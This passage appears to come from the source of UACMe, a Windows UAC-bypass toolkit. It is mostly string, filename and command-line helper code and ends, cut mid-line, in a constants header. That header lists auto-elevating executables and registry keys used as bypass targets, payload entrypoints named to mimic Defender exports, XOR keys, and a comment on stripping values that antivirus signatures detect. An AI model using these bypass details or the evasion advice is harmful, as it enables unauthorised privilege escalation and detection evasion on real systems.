    "content": "#include <Windows.h>\n#include \"minirtl.h\"\n\nchar *_filename_a(const char *f)\n{\n\tchar *p = (char *)f;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (char)0) {\n\t\tif (*f == '\\\\')\n\t\t\tp = (char *)f + 1;\n\t\tf++;\n\t}\n\treturn p;\n}\n\nwchar_t *_filename_w(const wchar_t *f)\n{\n\twchar_t *p = (wchar_t *)f;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (wchar_t)0) {\n\t\tif (*f == (wchar_t)'\\\\')\n\t\t\tp = (wchar_t *)f + 1;\n\t\tf++;\n\t}\n\treturn p;\n}\n\nchar *_fileext_a(const char *f)\n{\n\tchar *p = 0;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (char)0) {\n\t\tif (*f == '.')\n\t\t\tp = (char *)f;\n\t\tf++;\n\t}\n\n\tif (p == 0)\n\t\tp = (char *)f;\n\n\treturn p;\n}\n\nwchar_t *_fileext_w(const wchar_t *f)\n{\n\twchar_t *p = 0;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (wchar_t)0) {\n\t\tif (*f == (wchar_t)'.')\n\t\t\tp = (wchar_t *)f;\n\t\tf++;\n\t}\n\n\tif (p == 0)\n\t\tp = (wchar_t *)f;\n\n\treturn p;\n}\n\nchar *_filename_noext_a(char *dest, const char *f)\n{\n    char *p, *l, *dot;\n\n    if ((f == 0) || (dest == 0))\n        return 0;\n\n    p = _filename_a(f);\n    if (p == 0)\n        return 0;\n\n    dot = _strend_a(p);\n    if (dot == 0)\n        return 0;\n\n    l = p;\n\n    while (*l != (char)0)\n    {\n        if (*l == '.')\n            dot = l;\n        l++;\n    }\n\n    while (p<dot)\n    {\n        *dest = *p;\n        p++;\n        dest++;\n    }\n\n    *dest = 0;\n    return dest;\n}\n\nwchar_t *_filename_noext_w(wchar_t *dest, const wchar_t *f)\n{\n    wchar_t *p, *l, *dot;\n\n    if ((f == 0) || (dest == 0))\n        return 0;\n\n    p = _filename_w(f);\n    if (p == 0)\n        return 0;\n\n    dot = _strend_w(p);\n    if (dot == 0)\n        return 0;\n\n    l = p;\n\n    while (*l != (wchar_t)0)\n    {\n        if (*l == (wchar_t)'.')\n            dot = l;\n        l++;\n    }\n\n    while (p<dot)\n    {\n        *dest = *p;\n        p++;\n        dest++;\n    }\n\n    *dest = 0;\n    
return dest;\n}\n\nchar *_filepath_a(const char *fname, char *fpath)\n{\n    char *p = (char *)fname, *p0 = (char*)fname, *p1 = (char*)fpath;\n\n\tif ((fname == 0) || (fpath == NULL)) \n\t\treturn 0;\n\n\twhile (*fname != (char)0) {\n\t\tif (*fname == '\\\\')\n\t\t\tp = (char *)fname + 1;\n\t\tfname++;\n\t}\n\n    while (p0 < p) {\n        *p1 = *p0;\n        p1++;\n        p0++;\n    }\n    *p1 = 0;\n\n\treturn fpath;\n}\n\nwchar_t *_filepath_w(const wchar_t *fname, wchar_t *fpath)\n{\n    wchar_t *p = (wchar_t *)fname, *p0 = (wchar_t*)fname, *p1 = (wchar_t*)fpath;\n\n    if ((fname == 0) || (fpath == NULL))\n        return 0;\n\n    while (*fname != (wchar_t)0) {\n        if (*fname == '\\\\')\n            p = (wchar_t *)fname + 1;\n        fname++;\n    }\n\n    while (p0 < p) {\n        *p1 = *p0;\n        p1++;\n        p0++;\n    }\n    *p1 = 0;\n\n    return fpath;\n}\n"
  },
  {
    "path": "Source/Shared/_filename.h",
    "content": "#pragma once\n\n#ifndef _FILENAMEH_\n#define _FILENAMEH_\n\nchar *_filename_a(const char *f);\nwchar_t *_filename_w(const wchar_t *f);\nchar *_fileext_a(const char *f);\nwchar_t *_fileext_w(const wchar_t *f);\nchar *_filename_noext_a(char *dest, const char *f);\nwchar_t *_filename_noext_w(wchar_t *dest, const wchar_t *f);\nchar *_filepath_a(const char *fname, char *fpath);\nwchar_t *_filepath_w(const wchar_t *fname, wchar_t *fpath);\n\n#ifdef UNICODE\n#define _filename  _filename_w\n#define _fileext   _fileext_w\n#define _filepath  _filepath_w\n#define _filename_noext  _filename_noext_w\n#else // ANSI\n#define _filename  _filename_a\n#define _fileext   _fileext_a\n#define _filepath  _filepath_a\n#define _filename_noext  _filename_noext_a\n#endif\n\n#endif /* _FILENAMEH_ */"
  },
  {
    "path": "Source/Shared/_strcat.c",
    "content": "#include \"rtltypes.h\"\n\nchar *_strcat_a(char *dest, const char *src)\n{\n\tif ( (dest==0) || (src==0) )\n\t\treturn dest;\n\n\twhile ( *dest!=0 )\n\t\tdest++;\n\n\twhile ( *src!=0 ) {\n\t\t*dest = *src;\n\t\tdest++;\n\t\tsrc++;\n\t} \n\n\t*dest = 0;\n\treturn dest;\n}\n\nwchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)\n{\n\tif ( (dest==0) || (src==0) )\n\t\treturn dest;\n\n\twhile ( *dest!=0 )\n\t\tdest++;\n\n\twhile ( *src!=0 ) {\n\t\t*dest = *src;\n\t\tdest++;\n\t\tsrc++;\n\t} \n\n\t*dest = 0;\n\treturn dest;\n}\n"
  },
  {
    "path": "Source/Shared/_strcmp.c",
    "content": "#include \"rtltypes.h\"\n\nint _strcmp_a(const char *s1, const char *s2)\n{\n\tchar c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tdo {\n\t\tc1 = *s1;\n\t\tc2 = *s2;\n\t\ts1++;\n\t\ts2++;\n\t} while ( (c1 != 0) && (c1 == c2) );\n\t\n\treturn (int)(c1 - c2);\n}\n\nint _strcmp_w(const wchar_t *s1, const wchar_t *s2)\n{\n\twchar_t\tc1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tdo {\n\t\tc1 = *s1;\n\t\tc2 = *s2;\n\t\ts1++;\n\t\ts2++;\n\t} while ( (c1 != 0) && (c1 == c2) );\n\t\n\treturn (int)(c1 - c2);\n}\n"
  },
  {
    "path": "Source/Shared/_strcmpi.c",
    "content": "#include \"rtltypes.h\"\n\nint _strcmpi_a(const char *s1, const char *s2)\n{\n\tchar c1, c2;\n\t\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tdo {\n\t\tc1 = locase_a(*s1);\n\t\tc2 = locase_a(*s2);\n\t\ts1++;\n\t\ts2++;\n\t} while ( (c1 != 0) && (c1 == c2) );\n\t\n\treturn (int)(c1 - c2);\n}\n\nint _strcmpi_w(const wchar_t *s1, const wchar_t *s2)\n{\n\twchar_t c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tdo {\n\t\tc1 = locase_w(*s1);\n\t\tc2 = locase_w(*s2);\n\t\ts1++;\n\t\ts2++;\n\t} while ( (c1 != 0) && (c1 == c2) );\n\t\n\treturn (int)(c1 - c2);\n}\n"
  },
  {
    "path": "Source/Shared/_strcpy.c",
    "content": "#include \"rtltypes.h\"\n\nchar *_strcpy_a(char *dest, const char *src)\n{\n\tchar *p;\n\n\tif ( (dest==0) || (src==0) )\n\t\treturn dest;\n\n\tif (dest == src)\n\t\treturn dest;\n\n\tp = dest;\n\twhile ( *src!=0 ) {\n\t\t*p = *src;\n\t\tp++;\n\t\tsrc++;\n\t} \n\n\t*p = 0;\n\treturn dest;\n}\n\nwchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)\n{\n\twchar_t *p;\n\n\tif ((dest == 0) || (src == 0))\n\t\treturn dest;\n\n\tif (dest == src)\n\t\treturn dest;\n\n\tp = dest;\n\twhile ( *src!=0 ) {\n\t\t*p = *src;\n\t\tp++;\n\t\tsrc++;\n\t} \n\n\t*p = 0;\n\treturn dest;\n}\n"
  },
  {
    "path": "Source/Shared/_strend.c",
    "content": "#include \"rtltypes.h\"\n\nchar *_strend_a(const char *s)\n{\n\tif ( s==0 )\n\t\treturn 0;\n\n\twhile ( *s!=0 )\n\t\ts++;\n\n\treturn (char *)s;\n}\n\nwchar_t *_strend_w(const wchar_t *s)\n{\n\tif ( s==0 )\n\t\treturn 0;\n\n\twhile ( *s!=0 )\n\t\ts++;\n\n\treturn (wchar_t *)s;\n}\n"
  },
  {
    "path": "Source/Shared/_strlen.c",
    "content": "#include \"rtltypes.h\"\n\nsize_t _strlen_a(const char *s)\n{\n\tchar *s0 = (char *)s;\n\n\tif ( s==0 )\n\t\treturn 0;\n\n\twhile ( *s!=0 )\n\t\ts++;\n\n\treturn (s-s0);\n}\n\nsize_t _strlen_w(const wchar_t *s)\n{\n\twchar_t *s0 = (wchar_t *)s;\n\n\tif ( s==0 )\n\t\treturn 0;\n\n\twhile ( *s!=0 )\n\t\ts++;\n\n\treturn (s-s0);\n}\n"
  },
  {
    "path": "Source/Shared/_strncmp.c",
    "content": "#include \"rtltypes.h\"\n\nint _strncmp_a(const char *s1, const char *s2, size_t cchars)\n{\n\tchar c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tif ( cchars==0 )\n\t\treturn 0;\n\n\tdo {\n\t\tc1 = *s1;\n\t\tc2 = *s2;\n\t\ts1++;\n\t\ts2++;\n\t\tcchars--;\n\t} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );\n\t\n\treturn (int)(c1 - c2);\n}\n\nint _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)\n{\n\twchar_t c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tif ( cchars==0 )\n\t\treturn 0;\n\n\tdo {\n\t\tc1 = *s1;\n\t\tc2 = *s2;\n\t\ts1++;\n\t\ts2++;\n\t\tcchars--;\n\t} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );\n\t\n\treturn (int)(c1 - c2);\n}\n"
  },
  {
    "path": "Source/Shared/_strncmpi.c",
    "content": "#include \"rtltypes.h\"\n\nint _strncmpi_a(const char *s1, const char *s2, size_t cchars)\n{\n\tchar c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tif ( cchars==0 )\n\t\treturn 0;\n\n\tdo {\n\t\tc1 = locase_a(*s1);\n\t\tc2 = locase_a(*s2);\n\t\ts1++;\n\t\ts2++;\n\t\tcchars--;\n\t} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );\n\t\n\treturn (int)(c1 - c2);\n}\n\nint _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)\n{\n\twchar_t c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tif ( cchars==0 )\n\t\treturn 0;\n\n\tdo {\n\t\tc1 = locase_w(*s1);\n\t\tc2 = locase_w(*s2);\n\t\ts1++;\n\t\ts2++;\n\t\tcchars--;\n\t} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );\n\t\n\treturn (int)(c1 - c2);\n}\n"
  },
  {
    "path": "Source/Shared/_strncpy.c",
    "content": "#include \"rtltypes.h\"\n\nchar *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)\n{\n\tchar *p;\n\n\tif ( (dest==0) || (src==0) || (ccdest==0) )\n\t\treturn dest;\n\n\tccdest--;\n\tp = dest;\n\n\twhile ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {\n\t\t*p = *src;\n\t\tp++;\n\t\tsrc++;\n\t\tccdest--;\n\t\tccsrc--;\n\t}\n\n\t*p = 0;\n\treturn dest;\n}\n\nwchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)\n{\n\twchar_t *p;\n\n\tif ( (dest==0) || (src==0) || (ccdest==0) )\n\t\treturn dest;\n\n\tccdest--;\n\tp = dest;\n\n\twhile ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {\n\t\t*p = *src;\n\t\tp++;\n\t\tsrc++;\n\t\tccdest--;\n\t\tccsrc--;\n\t}\n\n\t*p = 0;\n\treturn dest;\n}\n"
  },
  {
    "path": "Source/Shared/_strstri.c",
    "content": "#include \"rtltypes.h\"\n\nchar *_strstri_a(const char *s, const char *sub_s)\n{\n\tchar c0, c1, c2, *tmps, *tmpsub;\n\n\tif (s == sub_s)\n\t\treturn (char *)s;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tif (sub_s == 0)\n\t\treturn 0;\n\n\tc0 = locase_a(*sub_s);\n\twhile (c0 != 0) {\n\n\t\twhile (*s != 0) {\n\t\t\tc2 = locase_a(*s);\n\t\t\tif (c2 == c0)\n\t\t\t\tbreak;\n\t\t\ts++;\n\t\t}\n\n\t\tif (*s == 0)\n\t\t\treturn 0;\n\n\t\ttmps = (char *)s;\n\t\ttmpsub = (char *)sub_s;\n\t\tdo {\n\t\t\tc1 = locase_a(*tmps);\n\t\t\tc2 = locase_a(*tmpsub);\n\t\t\ttmps++;\n\t\t\ttmpsub++;\n\t\t} while ((c1 == c2) && (c2 != 0));\n\n\t\tif (c2 == 0)\n\t\t\treturn (char *)s;\n\n\t\ts++;\n\t}\n\treturn 0;\n}\n\nwchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s)\n{\n\twchar_t c0, c1, c2, *tmps, *tmpsub;\n\n\tif (s == sub_s)\n\t\treturn (wchar_t *)s;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tif (sub_s == 0)\n\t\treturn 0;\n\n\tc0 = locase_w(*sub_s);\n\twhile (c0 != 0) {\n\n\t\twhile (*s != 0) {\n\t\t\tc2 = locase_w(*s);\n\t\t\tif (c2 == c0)\n\t\t\t\tbreak;\n\t\t\ts++;\n\t\t}\n\n\t\tif (*s == 0)\n\t\t\treturn 0;\n\n\t\ttmps = (wchar_t *)s;\n\t\ttmpsub = (wchar_t *)sub_s;\n\t\tdo {\n\t\t\tc1 = locase_w(*tmps);\n\t\t\tc2 = locase_w(*tmpsub);\n\t\t\ttmps++;\n\t\t\ttmpsub++;\n\t\t} while ((c1 == c2) && (c2 != 0));\n\n\t\tif (c2 == 0)\n\t\t\treturn (wchar_t *)s;\n\n\t\ts++;\n\t}\n\treturn 0;\n}\n"
  },
  {
    "path": "Source/Shared/cmdline.c",
    "content": "#include <windows.h>\n\nBOOL GetCommandLineParamW(\n\tIN\tLPCWSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPWSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t)\n{\n\tULONG\tc, plen = 0;\n\tWCHAR\tdivider;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = 0;\n\n\tif (CmdLine == NULL) {\n\t\tif ((Buffer != NULL) && (BufferSize > 0))\n\t\t\t*Buffer = 0;\n\t\treturn FALSE;\n\t}\n\n\tfor (c = 0; c <= ParamIndex; c++) {\n\t\tplen = 0;\n\n\t\twhile (*CmdLine == ' ')\n\t\t\tCmdLine++;\n\n\t\tswitch (*CmdLine) {\n\t\tcase 0:\n\t\t\tgoto zero_term_exit;\n\n\t\tcase '\"':\n\t\t\tCmdLine++;\n\t\t\tdivider = '\"';\n\t\t\tbreak;\n\n\t\tdefault:\n\t\t\tdivider = ' ';\n\t\t}\n\n\t\twhile ((*CmdLine != '\"') && (*CmdLine != divider) && (*CmdLine != 0)) {\n\t\t\tplen++;\n\t\t\tif (c == ParamIndex)\n\t\t\t\tif ((plen < BufferSize) && (Buffer != NULL)) {\n\t\t\t\t\t*Buffer = *CmdLine;\n\t\t\t\t\tBuffer++;\n\t\t\t\t}\n\t\t\tCmdLine++;\n\t\t}\n\n\t\tif (*CmdLine != 0)\n\t\t\tCmdLine++;\n\t}\n\nzero_term_exit:\n\n\tif ((Buffer != NULL) && (BufferSize > 0))\n\t\t*Buffer = 0;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = plen;\n\n\tif (plen < BufferSize)\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\nBOOL GetCommandLineParamA(\n\tIN\tLPCSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t)\n{\n\tULONG\tc, plen = 0;\n\tCHAR\tdivider;\n\n\tif (CmdLine == NULL)\n\t\treturn FALSE;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = 0;\n\n\tfor (c = 0; c <= ParamIndex; c++) {\n\t\tplen = 0;\n\n\t\twhile (*CmdLine == ' ')\n\t\t\tCmdLine++;\n\n\t\tswitch (*CmdLine) {\n\t\tcase 0:\n\t\t\tgoto zero_term_exit;\n\n\t\tcase '\"':\n\t\t\tCmdLine++;\n\t\t\tdivider = '\"';\n\t\t\tbreak;\n\n\t\tdefault:\n\t\t\tdivider = ' ';\n\t\t}\n\n\t\twhile ((*CmdLine != '\"') && (*CmdLine != divider) && (*CmdLine != 0)) {\n\t\t\tplen++;\n\t\t\tif (c == ParamIndex)\n\t\t\t\tif ((plen < BufferSize) && (Buffer != NULL)) 
{\n\t\t\t\t\t*Buffer = *CmdLine;\n\t\t\t\t\tBuffer++;\n\t\t\t\t}\n\t\t\tCmdLine++;\n\t\t}\n\n\t\tif (*CmdLine != 0)\n\t\t\tCmdLine++;\n\t}\n\nzero_term_exit:\n\n\tif ((Buffer != NULL) && (BufferSize > 0))\n\t\t*Buffer = 0;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = plen;\n\n\tif (plen < BufferSize)\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\nchar *ExtractFilePathA(const char *FileName, char *FilePath)\n{\n\tchar *p = (char *)FileName, *p0 = (char *)FileName;\n\n\tif ((FileName == 0) || (FilePath == 0))\n\t\treturn 0;\n\n\twhile (*FileName != 0) {\n\t\tif (*FileName == '\\\\')\n\t\t\tp = (char *)FileName + 1;\n\t\tFileName++;\n\t}\n\n\twhile (p0 < p) {\n\t\t*FilePath = *p0;\n\t\tFilePath++;\n\t\tp0++;\n\t}\n\n\t*FilePath = 0;\n\n\treturn FilePath;\n}\n\nwchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath)\n{\n\twchar_t *p = (wchar_t *)FileName, *p0 = (wchar_t *)FileName;\n\n\tif ((FileName == 0) || (FilePath == 0))\n\t\treturn 0;\n\n\twhile (*FileName != 0) {\n\t\tif (*FileName == '\\\\')\n\t\t\tp = (wchar_t *)FileName + 1;\n\t\tFileName++;\n\t}\n\n\twhile (p0 < p) {\n\t\t*FilePath = *p0;\n\t\tFilePath++;\n\t\tp0++;\n\t}\n\n\t*FilePath = 0;\n\n\treturn FilePath;\n}\n"
  },
  {
    "path": "Source/Shared/cmdline.h",
    "content": "#ifndef _CMDLINEH_\n#define _CMDLINEH_\n\nBOOL GetCommandLineParamW(\n\tIN\tLPCWSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPWSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t);\n\nBOOL GetCommandLineParamA(\n\tIN\tLPCSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t);\n\nchar *ExtractFilePathA(const char *FileName, char *FilePath);\nwchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);\n\n#ifdef UNICODE\n\n#define ExtractFilePath\t\t\tExtractFilePathW\n#define GetCommandLineParam\t\tGetCommandLineParamW\n\n#else // ANSI\n\n#define ExtractFilePath\t\t\tExtractFilePathA\n#define GetCommandLineParam\t\tGetCommandLineParamA\n\n#endif\n\n#endif /* _CMDLINEH_ */\n"
  },
  {
    "path": "Source/Shared/consts.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2015 - 2025\n*\n*  TITLE:       CONSTS.H\n*\n*  VERSION:     3.69\n*\n*  DATE:        14 Dec 2025\n*\n*  Global consts definition file.\n*\n*  If you are looking for unique enough pattern look for values/regions marked as \"PYSH\".\n*  Get rid of these values, or customize them otherwise.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#define AKAGI_XOR_KEY               'naka'\n#define AKAGI_XOR_KEY2              ' pta'\n\n//\"UACMe\"\n#define ISDB_PROGRAMNAME                6\n\n#define UCM_VERSION_MAJOR       3\n#define UCM_VERSION_MINOR       6\n#define UCM_VERSION_REVISION    9\n#define UCM_VERSION_BUILD       2512\n\n#define SUPRUNPROCESS_TIMEOUT_DEFAULT 12000\n\n//\n// A very long list for future use.\n//\n#define UACME_SHARED_BASE_ID        'sTlA'\n\n//\n// Trash end char.\n//\n#define UCM_TRASH_END_CHAR          L'~'\n\n//\n// WORD sized id list.\n//\n#define AKAGI_COMPLETION_EVENT_ID   'ab'\n#define AKAGI_SHARED_SECTION_ID     'cd'\n#define AKAGI_BDESCRIPTOR_NAME_ID   'ef'\n#define FUBUKI_SYNC_MUTEX_ID        'a1'\n#define FUBUKI_PCA_SECTION_ID       '0f'\n#define FUBUKI_PCA_EVENT_ID         '1f'\n\n#define FUBUKI_PCA_PAYLOAD_RUN      (0x1)\n#define FUBUKI_PCA_LOADER_RUN       (0x2)\n#define FUBUKI_PCA_ALL_RUN          (FUBUKI_PCA_PAYLOAD_RUN | FUBUKI_PCA_LOADER_RUN)\n\n//\n// Kamikaze consts\n//\n#define KAMIKAZE_MARKER             \"https\"\n#define WF_MSC                      L\"wf.msc\"\n\n#define T_DEFAULT_DESKTOP           L\"WinSta0\\\\Default\"\n\n#define T_WINDOWS_CURRENT_VERSION   L\"MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\"\n\n#pragma region PYSH\n\n#define T_DISPLAY_CALIBRATION       L\"Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\ICM\\\\Calibration\"\n#define T_PCA_STORE                 L\"Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\"\n#define T_APPCOMPAT_LAYERS          L\"Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Layers\"\n#define T_PCA_PERSISTED             L\"Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Persisted\"\n#define T_APP_ASSOC_TOASTS          L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\ApplicationAssociationToasts\"\n#define T_HTMLHELP_AUTHOR           L\"Software\\\\Microsoft\\\\HtmlHelp Author\"\n#define T_WEBVIEW_POLICY            L\"Software\\\\Policies\\\\Microsoft\\\\Edge\\\\WebView2\\\\BrowserExecutableFolder\"\n\n#define T_CURVER                    L\"CurVer\"\n#define T_MSSETTINGS                L\"ms-settings\"\n#define T_MSWINDOWSSTORE            L\"ms-windows-store\"\n#define T_QUICKASSIST               L\"ms-quick-assist:\"\n#define T_CLASSESFOLDER             L\"Folder\"\n#define T_LAUNCHERSYSTEMSETTINGS    L\"Launcher.SystemSettings\"\n#define T_LOCATION                  L\"Location\"\n\n#define ELLOCNAK_MSU                L\"update.msu\"\n#define RUN_CMD_COMMAND             L\" /c start \"\n\n#define T_APPXSVC                   L\"AppXSvc\"\n#define T_PCASVC                    L\"PcaSvc\"\n\n#pragma endregion\n\n#define T_SOFTWARE_CLASSES          L\"Software\\\\Classes\"\n\n#define T_SHELL_OPEN                L\"\\\\shell\\\\open\"\n#define T_SHELL_COMMAND             L\"command\"\n#define T_URL_PROTOCOL              L\"URL Protocol\"\n\n#define T_URL_MS_WIN_STORE          L\"URL:ms-windows-store\"\n\n#define T_SDDL_ALL_FOR_EVERYONE     L\"D:(A;;GA;;;WD)\"\n#define T_SDDL_EVERYONE_FULL_ACCESS L\"D:PAI(A;OICI;FA;;;WD)\"\n#define T_WINDIR                    
L\"windir\"\n#define T_SYSTEMROOT                L\"systemroot\"\n#define T_WINDOWSMEDIAPLAYER        L\"Windows Media Player\"\n\n#define T_DELEGATEEXECUTE           L\"DelegateExecute\"\n\n#define T_PROTO_HTTP                L\"http\"\n\n//\n// Unit names and entrypoints\n//\n#pragma region PYSH\n#define KAMIKAZE_MSC                    L\"kmkze.msc\"\n#define KAMIKAZE_LAUNCHER               L\"readme.html\"\n\n#define FUBUKI_EXT_ENTRYPOINT           \"MpManagerOpen\"\n#define FUBUKI_WND_HOOKPROC             \"MpHandleClose\"\n#define FUBUKI_DEFAULT_ENTRYPOINT       \"MpScanStart\"\n#define FUBUKI_ENTRYPOINT_UIACCESS2     \"MpScanControl\"\n#define FUBUKI_ENTRYPOINT_UIACCESS3     \"MpUpdateEngine\"\n#define FUBUKI_ENTRYPOINT_SXS           \"MpThreatOpen\"\n#define FUBUKI_ENTRYPOINT_PCAEXE        \"MpManagerStatusQuery\"\n#define FUBUKI_ENTRYPOINT_PCADLL        \"MpManagerStatusQueryEx\"\n#define FUBUKI_ENTRYPOINT_QASSIST       \"MpThreatEnumerate\"\n#define AKATSUKI_ENTRYPOINT_EXE         \"Wow64LogMessageArgList\" \n#pragma endregion\n\n//\n// Windows dll names\n//\n#define APISET_KERNEL32LEGACY       L\"api-ms-win-core-kernel32-legacy-l1.DLL\"\n\n#define ATL_DLL                     L\"ATL.dll\"\n#define BLUETOOTHDIAGNOSTICUTIL_DLL L\"BluetoothDiagnosticUtil.dll\"\n#define COMCTL32_DLL                L\"comctl32.dll\"\n#define DISMCORE_DLL                L\"dismcore.dll\"\n#define DUSER_DLL                   L\"duser.dll\"\n#define EMBEDDEDBROWSERWEBVIEW_DLL  L\"EmbeddedBrowserWebView.dll\"\n#define GDIPLUS_DLL                 L\"GdiPlus.dll\"\n#define ISCSIEXE_DLL                L\"iscsiexe.dll\"\n#define OSKSUPPORT_DLL              L\"OskSupport.dll\"\n#define PCADM_DLL                   L\"pcadm.dll\"\n#define PERFORMANCETRACEHANDLER_DLL L\"PerformanceTraceHandler.dll\"\n#define SHELL32_DLL                 L\"shell32.dll\"\n#define WINMM_DLL                   L\"winmm.dll\"\n#define WOW64LOG_DLL                L\"wow64log.dll\"\n\n//\n// Native image cache 
targets\n//\n#define ASSEMBLY_MMCEX              L\"MMCEx\"\n#define MMCEX_NI_DLL                L\"MMCEx.ni.dll\"\n#define MMCEX_NI_DLL_AUX            L\"MMCEx.ni.dll.aux\"\n\n#define ASSEMBLY_ACCESSIBILITY      L\"Accessibility\"\n\n//\n// Windows executables\n//\n#define CMD_EXE                     L\"cmd.exe\"\n#define CLIPUP_EXE                  L\"Clipup.exe\"\n#define COMPUTERDEFAULTS_EXE        L\"computerdefaults.exe\"\n#define CONSENT_EXE                 L\"consent.exe\"\n#define DCCW_EXE                    L\"dccw.exe\"\n#define EVENTVWR_EXE                L\"eventvwr.exe\"\n#define EXPLORER_EXE                L\"explorer.exe\"\n#define FODHELPER_EXE               L\"fodhelper.exe\"\n#define ISCSICPL_EXE                L\"iscsicpl.exe\"\n#define MMC_EXE                     L\"mmc.exe\"\n#define MSCONFIG_EXE                L\"msconfig.exe\"\n#define MSCHEDEXE_EXE               L\"mschedexe.exe\"\n#define MSDT_EXE                    L\"msdt.exe\"\n#define OSK_EXE                     L\"osk.exe\"\n#define PKGMGR_EXE                  L\"pkgmgr.exe\"\n#define QUICKASSIST_EXE             L\"QuickAssist.exe\"\n#define SDCLT_EXE                   L\"sdclt.exe\"\n#define SLUI_EXE                    L\"slui.exe\"\n#define TASKHOSTW_EXE               L\"taskhostw.exe\"\n#define WINSAT_EXE                  L\"winsat.exe\"\n#define WINVER_EXE                  L\"winver.exe\"\n#define WSRESET_EXE                 L\"WSReset.exe\"\n#define WUSA_EXE                    L\"wusa.exe\"\n\n//\n// Windows subdirectories\n//\n\n// system32 only name\n#define SYSTEM32_DIR_NAME           L\"system32\"\n\n// system32 with both sides slash\n#define SYSTEM32_DIR                L\"\\\\system32\\\\\"\n\n// syswow64 with both sides slash\n#define SYSWOW64_DIR                L\"\\\\syswow64\\\\\"\n\n#define NET2_DIR                    L\"v2.0.50727\"\n#define NET4_DIR                    L\"v4.0.30319\"\n#define MSNETFRAMEWORK_DIR          L\"Microsoft.NET\\\\Framework\"\n#define 
